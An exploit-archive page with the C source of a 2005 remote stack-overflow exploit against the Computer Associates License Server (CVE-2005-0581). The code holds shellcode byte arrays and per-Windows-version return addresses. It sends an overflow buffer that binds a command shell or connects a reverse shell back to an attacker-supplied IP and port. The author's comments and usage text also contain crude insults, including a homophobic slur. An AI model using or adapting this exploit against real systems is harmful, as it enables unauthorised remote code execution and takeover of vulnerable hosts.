exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

101_cali.c

101_cali.c
Posted Mar 12, 2005
Authored by class101 | Site class101.org

This exploit takes advantage of a stack overflow vulnerability in the CA License Server network service. Versions 1.61 and below are susceptible.

tags | exploit, overflow
advisories | CVE-2005-0581
SHA-256 | 7d2cf16bb7713ea7d275c701f1c25126c9a157166b80c35eb4d2bbdd5353043e

101_cali.c

Change Mirror Download
/*
Computer-Associates, License Service Stack Overflow

Homepage: ca.com
Affected version: v1.61 and below (in eTrust, Unicenter, BrightStor, etc..)
Patched version: hotfix
Link: ca.com
Date: 04 March 2005

Application Risk: Tsunami
Internet Risk: High

Dicovery Credits: Barnaby Jack (eeye.com)
Exploit Credits : class101

Hole History:

02-3-2005: BOF flaws published by Barnaby Jack of eeye.com
04-3-2005: metasploit module released
06-2-2005: hat-squad exploit released using again another way than msf,
a nasty way auto-bypassing XP/2003 stack's protections :)

Notes:

-2 bad chars, 0x00, 0x20
-This is possible to trigger at least several big flaws per affected commands,
case1: you own eip, ebx 4 bytes up to it is usable
case2: you own eip, esp pointing right after is usable
case3: you own eip, esi pointing into the buffer
In this exploit, I have choosed case2, allowing us to overwrite eip with a
jmp/call esp, a push esp, retn or why not something useful in a ca's dll, w00t :P,
can be a good challenge to search on this, look around
0x10010000.licscvr.dll
-tiny upgrade of the awesome vlad902's shellcode to remove that f'king 0x20 into
the decoded reverse shellcode v1.31
by the way, sending up this bad char to the bottom of what you know of some amazing
wannabel33t deface kiddies crawling my website,
talking in sh0utb0x, sucking my c0x, answer in a code, he! :-) (IHS , iranian homosec
deface team to not name them :>)
-beware that the ca license service autoban and this is possible to know the OS with
A0 GETCONFIG SELF A <EOM>

Greet:

NIMA MAJIDI
BEHRANG FOULADI
PEJMAN
HAMID! :)
HAT-SQUAD.COM
metasploit.com
A^C^E of addict3d.org
str0ke of milw0rm.com
and my homy CLASS101.ORG :>
*/

#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

char scode[]=
"\x33\xC9\x83\xE9\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";

char scode2[]=
/*original vlad902's reverse shellcode from metasploit.com
NOT xored, modded by class101 to remove the common badchar "\x20"
original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
"\xFC\x6A"
"\xEB\x52" /*modded adjusting jump*/
"\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x3C\x8B\x7C\x05"
"\x78\x01\xEF"
"\x83\xC7\x01" /*modded, adding 1 to edi*/
"\x8B\x4F\x17" /*modded, adjusting ecx*/
"\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
"\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0"
"\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
"\x8B\x5F\x23" /*modded, adjusting ebx*/
"\x01\xEB\x66\x8B\x0C\x4B"
"\x8B\x5F\x1B" /*modded, adjusting ebx*/
"\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40"
"\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E"
"\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32"
"\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66"
"\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF"
"\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x00\x00\x00\x00"
"\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF"
"\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50"
"\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD"
"\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3"
"\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51"
"\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37"
"\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF"
"\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";

char payload[8192];

char esp2k[]="\x9F\xF8\x1A\x01"; /*jmp.esp*/
char espNT[]="\xA8\x14\xF9\x77"; /*push.esp.return*/
char espXP1[]="\x5E\xF0\xF7\x77"; /*push.esp.return*/
char espXP2[]="\x5C\xC3\x92\x7C"; /*push.esp.return*/
char espk3[]="\xAB\x8B\xFB\x77"; /*jmp.esp*/
char EOL[]="\x0D\x0A";
char talk1[]=
"\x47\x42\x52\x20";
char talk2[]=
"\x20\x3C\x45\x4F\x4D\x3E";

#ifdef WIN32
WSADATA wsadata;
#endif

void ver();
void usage(char* us);

int main(int argc,char *argv[])
{
ver();
unsigned long gip;
unsigned short gport;
char *target, *os;
if (argc>6||argc<3||atoi(argv[1])>5||atoi(argv[1])<1){usage(argv[0]);return -1;}
if (argc==5){usage(argv[0]);return -1;}
if (strlen(argv[2])<7){usage(argv[0]);return -1;}
if (argc==6)
{
if (strlen(argv[4])<7){usage(argv[0]);return -1;}
}
#ifndef WIN32
if (argc==6)
{
gip=inet_addr(argv[4])^(long)0x00000000;
gport=htons(atoi(argv[5]))^(short)0x0000;
}
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
if (argc==6)
{
gip=inet_addr(argv[4])^(ULONG)0x00000000;
gport=htons(atoi(argv[5]))^(USHORT)0x0000;
}
#endif
int ip=htonl(inet_addr(argv[2])), port;
if (argc==4||argc==6){port=atoi(argv[3]);} else port=10203;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1){printf("[+] socket() error\n");return -1;}
if (atoi(argv[1]) == 1){target=esp2k;os="Win2k SP4 Server English\n
[+] Win2k SP4 Pro English\n[+] Win2k SP? ? ?";}
if (atoi(argv[1]) == 2){target=espNT;os="WinNT SP6 Wkst. English";}
if (atoi(argv[1]) == 3){target=espXP2;os="WinXP SP2 Pro. English";}
if (atoi(argv[1]) == 4){target=espXP1;os="WinXP SP1a Pro. English";}
if (atoi(argv[1]) == 5){target=espk3;os="Win2003 SP4 Server English";}
printf("[+] target(s): %s\n",os);
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
printf("[+] connected, constructing the payload...\n");
#ifdef WIN32
Sleep(1000);
#else
Sleep(1);
#endif
strcpy(payload,talk1);
memset(payload+4,0x90,3208);
memcpy(payload+2024+4,target,4);
strcat(payload,talk2);strcat(payload,EOL);
if (argc==6)
{
memcpy(&scode2[167], &gip, 4);
memcpy(&scode2[173], &gport, 2);
memcpy(payload+2038,scode2,strlen(scode2));
}
else memcpy(payload+2038,scode,strlen(scode));
if (send(s,payload,strlen(payload),0)==-1) {
printf("[+] sending error 1, the server prolly rebooted.\n");return -1;}
#ifdef WIN32
Sleep(2000);
#else
Sleep(2);
#endif
printf("[+] size of payload: %d\n",strlen(payload));
printf("[+] payload sent.\n");
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}


void usage(char* us)
{
printf("USAGE: \n");
printf(" [+] . 101_calic.exe Target VulnIP (bind mode) \n");
printf(" [+] . 101_calic.exe Target VulnIP VulnPORT (bind mode) \n");
printf(" [+] . 101_calic.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode) \n");
printf("TARGET: \n");
printf(" [+] 1. Win2k SP4 Server English (*) \n");
printf(" [+] 1. Win2k SP4 Pro English (*) \n");
printf(" [+] 1. Win2k SP? ? ? \n");
printf(" [+] 2. WinNT SP6 Wkst. English (*) \n");
printf(" [+] 3. WinXP SP2 Pro. English \n");
printf(" [+] 4. WinXP SP1a Pro. English (*) \n");
printf(" [+] 5. Win2k3 SP0 Server English \n");
printf("NOTE: \n");
printf(" The exploit bind a cmdshell port 101 or \n");
printf(" reverse a cmdshell on your listener. \n");
printf(" A wildcard (*) mean tested working, else, supposed working. \n");
printf(" A symbol (-) mean all. \n");
printf(" Compilation msvc6, cygwin, Linux. \n");
return;
}
void ver()
{
printf(" \n");
printf(" ======================================[0.1]=====\n");
printf(" =======Computer Associates, License Client Service===========\n");
printf(" =============Remote Stack Overflow Exploit=============\n");
printf(" ======coded by class101=============[Hat-Squad.com]=====\n");
printf(" =============================[class101.org 2005]=====\n");
printf(" \n");
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    0 Files
  • 7
    Mar 7th
    0 Files
  • 8
    Mar 8th
    0 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    0 Files
  • 14
    Mar 14th
    0 Files
  • 15
    Mar 15th
    0 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close